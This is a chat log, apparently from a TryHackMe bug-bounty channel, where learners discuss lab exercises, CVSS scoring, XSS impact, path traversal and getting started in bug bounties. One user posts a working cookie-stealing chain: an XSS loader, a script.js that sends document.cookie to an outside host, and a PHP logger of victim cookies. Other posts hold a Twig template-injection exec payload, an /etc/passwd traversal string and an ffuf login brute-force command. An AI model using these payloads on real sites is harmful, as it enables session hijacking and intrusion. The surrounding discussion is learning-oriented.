thanks chatgpt said its an issue with my script.js file so ill try that fix first if not take a look at this

Gave +1 Rep to @paper ridge

their forums are a great help

already checked i think its an issue with the site or im missing something because the last session hijacking section i had no issues this one i am not recieving the cookie

probs an error on your payload

XSS payload - javascript:eval('var a=document.createElement('script');a.src='http://OUR_IP';document.body.appendChild(a)')

script.js - new Image().src='http://OUR_IP/index.php?c='+document.cookie; or document.location='http://OUR_IP/index.php?c='+document.cookie;

index.php - <?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>

both index.php and script.js are stored in /tmp/tmpserver

i did test this payload using netcat and did recieve a response

but when i use php this is whats returned - sudo php -S 0.0.0.0:8080 -t /tmp/tmpserver
[sudo] password for r3tr0:
[Fri Apr 28 10:43:45 2023] PHP 7.4.30 Development Server (http://0.0.0.0:8080) started
[Fri Apr 28 10:44:41 2023] 10.129.19.250:46118 Accepted
[Fri Apr 28 10:44:41 2023] 10.129.19.250:46118 [200]: (null) /script.js
[Fri Apr 28 10:44:41 2023] 10.129.19.250:46118 Closing

so i am not getting the cookie for some reason

yea, you're doing too much

Trying to calculate a CVS score with stored XSS, not too sure specifically on what to put for the CIA - because it would all depend on the JS that is being executed

Have you used the CVSS score calculator?

If it requires setup then you say yes, it will decrease the score

That's what I'm using at the moment

But I'm wondering what to put at the CIA part

Because it'd obviously depend on the JS that used in the stored XSS

You’re assessing what it can be used to do, not what you’re making it do

yeah idk ive tried all sorts im definately missing something i just dont know what

Have you done the CVSS course that they offer? It's free and takes minutes

Nope, which CSVV caculator?

Direct from FIRST

this one??

No the CVSS scoring one

This?

Okay, so with Stored XSS - the attack can be injected by the attacker without any interaction from the user, but obviously the user would have to be on the page with the vulernable component so in that case it would require UI, correct?

okay thankfully theres an example in there for stored XSS

I dont understand why its so low though:

Confidentially: you could execute malicious JS to send cookies and customer data in context
Integrity: you could modify the pages HTML
Availability: Again, by modifying the pages HTML your making the resource required not available

I think availability is referring to whether something like DoS is possible, essentially whether it's possible to make the user exit out of the website (clicking the x) before it does its thing. I do think modifying it to the extent of making a service not available may be possible, but it definitely depends on context

That's why you have to calculate the CVSS score for each vulnerability, it's on a case by case basis

I believe action refers to whether the user has to click a link, for example. Does the user have to actively participate for the exploit to work? Does the exploit work if the user is using the website normally?

you are right - part of the definition of 'availability' is uptime. If an attack breaks the resource and makes it inaccessible, it would raise the score for availability

But technically modifying the pages html to something different makes the original source inaccessible no?

Maybe? Again it's on a case by case basis

What's the stored xss in question? What does it affect? Could you feasibly cause any inaccessibility?

From my experience stored XSS isn't a big (it's usually medium severity) issue by itself. What is a problem is if its chained with something like a bad password change functionality (say, if you don't need to put in your current password). You can create an attack takeover like that, by calling a post request to that endpoint, and that's a critical vulnerability

But by itself it isn't a huge deal, and we've had people disregard it entirely during pentests. (as in, they don't fix it) That's why it's always important to try to escalate it, because the higher severity the vulnerability (the more you prove that the vulnerability is actually a big deal), the more likely the client is to fix it

huh

https://45w1nkv.medium.com/ldap-injection-653d7225dd8

guys i have discovered ssti Twig when i give this payload :{{7*7}} it shows 49 but when i give this kind of payload :{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} it give blank output what should i do now

i have even tried this all payload https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/README.md#twig---code-execution but still not its shows blank for all payload

I recommend for you to do this on your local machine and try to recreate the scenario

https://45w1nkv.medium.com/go-code-review-1-hard-coded-credentials-are-security-sensitive-4317a8431eaa

@young spoke same dude

Hi. I want to try out doing bug bounties but I don’t know where to start. I want to have some small successes with small rewards. Is there something like this? This would I also be the first real world thing I would do and I would I also do this as some sort of side hustle because I’m still in school. Also is this too early to do bug bounties and I should continue expanding my skillset or can start doing low level bug bounties?

Learn first before applying anything.

any tips on getting started? (ik this is a vague question)

for some reason I’m putting a payload and the websites returns back a 403 forbidden is there something i should do

read the pins 🙂

Thanks

That's not nearly enough info to help you, the kind of payload will be a useful start

it’s directory traversal

payload: ../../../etc/passwd

and it doesn't work?

is it supposed to be vulnerable to that or are you just trying it

I’m just trying it

But the website returns a 403

then its not vulnerable 😛

For that specific payload. But yeah probably not at all

yeah but my question is why does it return a 403

and should I try different payloads?

That depends on the web server

It could be that the web server is interpreting this as a nonexistent page then auto defaults to 403

nginx

or it could be returning 403 since there are invalid characters on the parameter its checking

if its nonexistent shouldn't it be a 404?

That depends on how it is coded 🙂

ohh ok

thanks man I really appreciate it

You could, like Mkunkn said, you might be getting a nonexistent page, and a different path might work, it may also be because of invalid characters, which a different payload might not use. There's not much harm in running a bunch of payloads using burp intruder.

ok I'll try doing that

just the way the webserver is coded

and you realize your not actually accessing the system files here? your basically saying https://website.com/etc/passwd, if etc/passwd isnt a file or directory on the webserver contents that its serving at then its gonna error

LFI usually involves something like index.php?file=xyz, because its being executed with php and then access the serves files, that's how it gets it

https://tryhackme.com/room/fileinc

say the input isn't sanitized, then you can use ?file=../../../../../../etc/passwd

LFI and traversal are worth considering seperately

true, but it usually has to involve a file parameter that it takes, you can't have something like https://webapp.thm/../../etc/passwd as that'll just take you to https://webapp.thm/etc/passwd

~~You can, just not using a browser as that'll work against you, see examples here https://owasp.org/www-community/attacks/Path_Traversal~~

It happens a lot more rarely, outside of things like embedded devices or custom webservers

So you can get it without having the webserver use a file handling script? (like index.php?file=xyz) I don't see how?

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored ***outside the web root folder.***

Yes, please scroll down to the examples.
It requires an exceptionally poorly programmed webserver

https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/goahead_traversal.rb
From a very cursory read, this looks to be an example?

https://www.exploit-db.com/exploits/21607 Yeah it is @fast fable

Sorry, totally skimmed over that example

But yeah, the webserver must be a pretty terrible one

Well, not a widely used one typically. Hence embedded devices.

But here's a quite recent example, in a widely used webserver: https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013

Yikes

Interesting how you need to encode it

To prevent path traversal attacks, the normalization function which is responsible to resolve URL-encoded values from the requested URI, resolved Unicode values one at a time. Hence when URL encoding the second dot as %2e, the logic fails to recognize %2e as dot thereby not decoding it, this converts the characters ../ to .%2e/ and bypasses the check.

ty for the read

Gave +1 Rep to @vocal folio

lets say this xss payload works '>><marquee><h1>XSS</h1></marquee> is that good enough to report or do I have to make an alert show

that doesn't show actual scripting, just adding elements - I'd make sure to show a working POC that demonstrates possible impact

but the payload works like the text is actually moving

yeah but what impact would have that

its all about impact

oh ok

This is not XSS. This is HTML Injection

ohh ok

should I report it?

impact?

and depends on how you do it, you might as well tho 🤷‍♂️

there’s no impact but I’m trying hard to find something

if you can tell me something that I should do to create impact tell me

Hi all, I am new to cybersecurity and I want to learning Bug bounty. Please suggest how and where to start.

well going through the #web-fundamentals-path on https://tryhackme.com/ is a good start in shadows opinion

Check the pinned messages in this channel

I have completed this path, at current I am in JR PT path in tryhackme.

Have you done JR PT path?

Currently in it. Last few sections left.

https://help.tryhackme.com/miscellaneous/the-bug-bounty-programme link is broken :\

is there an alternative?

https://help.tryhackme.com/en/articles/6495946-the-bug-bounty-program

Thank you @fast fable :D

Gave +1 Rep to @fast fable

it would be nice to have this link updated on the pinned messages

sure,cc @young spoke

This is the pinned message :)
#bug-bounty message

@paper flint
see #bug-bounty message

what's a self xss?

its when the victim unknowingly runs the code themselves in the browser

You know when you get all the warnings opening up the console? its to prevent against self xss

self-xss cannot be triggered in normal ways via a crafted URL or a cross-domain request

Instead, the vulnerability is only triggered if the victim themselves submits the XSS payload from their browser. Delivering a self-XSS attack normally involves socially engineering the victim to paste some attacker-supplied input into their browser. As such, it is normally considered to be a lame, low-impact issue.

its mostly social engineering

ahhh so reported the XSS, they were aware of the actual XSS but my initial vector was actually different so got a bounty for that which was nice of them

where do you hunt Jayy

wdym?

Slay

I don't actively look for bug bounties, (like using hackerone etc), its mostly just me browsering doing work or something and if I see something that looks like it could potentially cause issues, ill check if the site has a bugbounty and if they do, then a bit of digging for around an hour or so - then depending on if I get anything interesting, ill continue to dig for a couple more hours

That seems like a good approach

ah, i thought you actively hunt on platforms

oh nah, I don't have enough time for that

yeah, it works really well for me

and ill only continue to look if I get unexpected / not intended output (I dont really bother with blind injection and those sorts)

otherwise I dont bother wasting hours on it

Honestly a lot of regular bug bounty is just fuzzing

This feels like a better way to not spend too much time while also learning

When I'm allowed to, ill disclose the ones I've found and my thought process which hopefully will be of use to someone

fwiw I got an extra $50 for a detailed report, so always good to do that!

Do you have format for your pentest report?

nope

just images with text

I thought it requires a template to report ur findings

Nope 🤷‍♂️

that’s really only for execs

and i assume the company will write up their own shit once people have reported findings

in order to report to their own execs

but the technical guys, they don’t give a shit, they just want the details

😂🤣gotcha

Me fighting the urge to combine my head with a brick everytime i hear that word

cool

Go for it queen🫳

How's that going for you

Oh no 😂😂

Im losing my mind

That's terrible

Cool

Hi

I would I like to know in which language this was encoded

${/|_/|////_|/|\} = $ [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘YwBtAGQA’)))

Can anyone know which type of encrypted it was and how to decode it

what does this mean

Content spoofing and text injection issues without showing an attack vector/without being able to modify HTML/CSS

the b64 is cmd

Ya tq

What do you mean?

It means when you aren't able to show an attack vector that leads to plausible defacement of a website

hello

in order to get started in bug bounty, what paths should I complete in TryHackMe?

Hi, web fundamental. Also check pinned message

cannot solve authentication bypass Task 3

I am running the given command but still cannot get the username and password

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.26.116/customers/login -fc 200

The given command

Can you send a screenshot

plus, this sounds like something for #room-help , i'd ask you to send it there so others can also view

More visibility 🙂

https://45w1nkv.medium.com/sql-injection-vulnerability-in-golang-code-2-3536f027516d

@analog glen

Vulnerability reports generated by Burpsuite professionals are accepted or not ??

No, manual validation is required

ok

no

So can you seriously get a decent income just hunting using scanners?

Seems like if you can detect a bug using automated scanners it should have already been patched

No

And in most cases, using automated scanners is out of scope

in a job yeah, in bug bounties no

There is still manual validation 🙂

plus a lot of results from automated scans (missing HTTP headers, etc.) are not accepted as bugs 🙂

Yeah, that bit makes sense

also what Jayy said. Running automated scanners aren't allowed most of the time and in some cases that they are allowed, they are abysmally throttled (1 req/sec) so that affects scan times

https://hackerone.com/moonpay?view_policy=true

So this program for example, doesn't have any limitations, but you need to manually perform the exploit?

It does have limitations, wdym?

On automated scanners I mean?

Or do I just not see it?

Right, but that just means you need to manually perform the exploit

That's the confirmation it's referring to

"Interruption or degradation of our service"

Right, but I'd think it can still handle a decent pace before you start hitting DOS levels?

does anyone make a living from this?

people do yeah

Can anyone recommend a program which I should start as a beginner

So that I could be a bit safe side

I presume that some(or many) people(in this field) work in the job and do bugbounty as their private or side projects.

Some do. Bug bounty isn't a reliable income stream but it might be worthwhile if you want to have some experience hacking within the bounds of a particular program and producing reports

Other people do CTFs, study for certs or do all kinds of other projects/hobbies related, or not, to hacking

Can anyone help with this

What do you mean by a program

Like a bug bounty program?

yes

I am looking at VDP in Bugcrowd but can't decide which one should i go with

There are no "easy" VDPs, heck I don't even consider difficulty when it comes to bug bounty programs.

Don't think of them as training grounds. These are real companies, with real infrastructure, serving real users

Coming into this with a beginner background would just end up working against you

I suggest you try and solidify your knowledge and skills first

I would suggest doing the Hacker101 CTFs , the PortSwigger Academy training and plenty of machines in THM/HTB/VulnHub and other playgrounds. Perhaps spend time on PicoCTF and build your confidence. Perhaps check out the HTB CBBH cert and build your skills

Yeah I am doing learning path in THM at current I am in OPT (Offensive Pentesting) and completed Web fundamentals, JPT

Hi

I want to start bug bounty how should I start ?

i want learn in ethical way

#site-support I want to start bug bounty how should I start ?

Read the pins

?

@opaque relic

Is anyone from india going to defcon this year...?!

Whoops, wrong channel

everyone in the community says we need a mentor, so is there anyone here who can mentor me to find my first bug? I promise that I will follow every step you tell me. thanks in advance!

#general message

I'd to ask about the most common vulnerabilities that found on the web applications?

https://owasp.org/www-project-top-ten/

Ok thx

Gave +1 Rep to @fast fable

Where can you mostly guy's find vulun in outside or inside the app or site?

How can I (Account-Take-Over) any Account ? (2) https://medium.com/@ozomarzu/how-can-i-account-take-over-any-account-2-9533d54bc33e

@vocal folio

hi guys i have a problem when i want to connect to openvpn to solve a machine on try hack me. here is the error please help
2023-05-26 00:18:51 Note: cipher 'AES-256-CBC' in --data-ciphers is not supported by ovpn-dco, disabling data channel offload.

!vpnscript

Run this and see if it fixes your problem

@mint maple This channel is for bug bounty hunting

https://45w1nkv.medium.com/urn-injection-71fe662408f2

@opaque relic

They've done this over 4 times now and I've tagged multiple mods, with no action taken so I presume it's okay 🤷‍♂️

seems fair

will stop tagging mods now

Please don’t excessively self promote @trim narwhal

Posting your write ups is fine but actually interact with the community

Hwlo

Anyone online

If I can upload an image the filename format is /etc/new.jpg is it a vulnerability to report while conducting a pentest

Not without further testing

If you can prove that it was written outside the web directory, it is a vuln

It might also just be saved as \/etc\/new.jpg, so the special chars are being escaped

I'd say it could probably written as a vuln, lets say improperly sanitized input but it would be classified as P4 or P5 without further testing

just to add, before you submit a vuln always think whats the impact of your finding

Start with VDP programs
like
ford.com
https://hackerone.com/ford?type=team

what should someone do if they get an error from a parser when testing for xxe?

is that a sign for xxe?

depends on the error

could just be bad input and the error hasn't been handled

https://45w1nkv.medium.com/critical-union-based-sql-injection-vulnerability-38526ca8a851

@fast fable person is here again

lmao

@lavish hollow

@trim narwhal has been warned.

tbf the username checks out 😂

fr

I'm curious, how do you protect yourself legally when doing bug bounties? One's ISP might look at attacks as such, first thought is using a vpn or a vps

If you don't follow the guidelines and scopes in a bug bounty program and you take harmful actions against the company, you are engaging in criminal activity. Therefore, since that is the primary goal of bug bounty, you do not need to hide yourself. You will be fine with your ISP as long as you don't make a lot of traffic while scanning

You should speak to your ISP, it is against their terms of use in some cases

Now I doubt whether they meant their ISP or someone's ISP (Company?)

From the context, it sounds like they are referring to their own

Hey guys! Is there a channel to make announcement of bug bounties?

Can it be done here?

What do you mean?

people who are doing BB's - are you flying solo or in a group?

solo all the way 😎